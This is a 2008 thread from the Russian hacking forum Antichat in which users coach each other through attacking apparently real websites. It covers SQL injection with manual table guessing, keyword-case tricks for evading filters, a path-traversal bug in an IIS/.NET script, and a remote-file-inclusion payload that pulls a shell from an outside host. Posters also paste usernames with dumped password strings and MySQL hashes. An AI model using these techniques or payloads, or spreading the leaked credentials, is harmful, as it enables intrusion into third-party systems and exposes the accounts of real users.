Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

22.02.2008, 03:30
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме: 1373642
Репутация:
569
|
|
Я понял,но хня заключается в том что кроме версии,юзера и бд,нифига не выходит,хотя версия муси 5 information_schema не пашет,мож там фильтрация стоит какая, как на хостинге спайсвеб на from?
Последний раз редактировалось fobofob; 22.02.2008 в 03:38..
|
|
|

22.02.2008, 03:44
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме: 16641028
Репутация:
2371
|
|
fobofob, подбирай таблицы вручную
|
|
|

22.02.2008, 14:16
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
Сообщение от fobofob
Я понял,но хня заключается в том что кроме версии,юзера и бд,нифига не выходит,хотя версия муси 5 information_schema не пашет,мож там фильтрация стоит какая, как на хостинге спайсвеб на from?
Конечно не пашет! там не вильтрация, а ограничение прав. Те ж сказали, что даётся 1 БД на сайт. Значит всё просто, только столбцы нужно подобрать. А чтобы узнать имя БД - зарегай се аккаунт и посмотри. Вобщем проанализируй там всё.
а фильтрации часто можно обходить так. Например, если слово from, то FrOm fr FROMom. Но на джино нет фильтрации
P.S. В разделе XSS я выладивал как активную, так и пассиивную.
Последний раз редактировалось o3,14um; 22.02.2008 в 14:18..
|
|
|

22.02.2008, 16:04
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме: 1373642
Репутация:
569
|
|
и еще вопросик, что это за кодировка паролей :
art:=Ы#џlu/њ$ )
volov:FШ
bazin:VШЦб(¦
rozonova:NЕоА
gaponov:VМВ/юШ
malvina:з[^
anna:eЛдIн >(· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде
|
|
|

22.02.2008, 16:15
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
а может быть это просто кодировка дргуая?! Попробуй открыть ИнтернетЭксплорером и кодировку сменить на "автовыбор" или ещё чё...
|
|
|

23.02.2008, 00:48
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме: 839509
Репутация:
338
|
|
Сообщение от m0use
нашел один сай sql... из mysql.user version() - 4.1.20
достал логины и шеши
bla:*7E031FB695D422377447A5660A3B95FED283B260
bla:*7CDBD368F59FA498366CBEC09B7A5C2BAF06D045
потом пошли
bla:3bb4472d333b8afa
......
потом снова такого вида
bla:*7E031FB695D422355967A5660A3B95FED283B260
что это все значит
Это логин и хэш) если я не ошибаюсь =)
bla:*7E031FB695D422377447A5660A3B95FED283B260
Это я не знаю че за шифровка)
А это
Хэш MySQL =)
Вот ТУТ FAQ по хэшам 
|
|
|

23.02.2008, 02:09
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме: 2030482
Репутация:
1796
|
|
Сообщение от CaNNabi$
bla:*7E031FB695D422377447A5660A3B95FED283B260
Это я не знаю че за шифровка)
Это печально... Если мне не изменяет память это хеш пятого мускула
__________________
Кто я?..
|
|
|
вопрос по IIS и Microsoft .NET Framework |

24.02.2008, 02:53
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме: 394753
Репутация:
120
|
|
вопрос по IIS и Microsoft .NET Framework
Такой вопрос
Есть уязвимость, точнее есть ошибка в скрипте
при воде левых данных выводит
Invalid path for MapPath 'Skins/Default/Modules\../../../..].ascx'. A virtual path is expected.
тоесть в конце пути скрипт добавляет расширение ascx
пробовал добавить %00
непомогло
Подскажите плиз что делать
|
|
|

24.02.2008, 03:00
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме: 5128756
Репутация:
2032
|
|
попробуй param=http://site.com/shell.txt?
|
|
|

24.02.2008, 03:05
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
попробуй добавить ?
и плюс попробуй "инклудить" файлы, что звщищены .htaccess
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|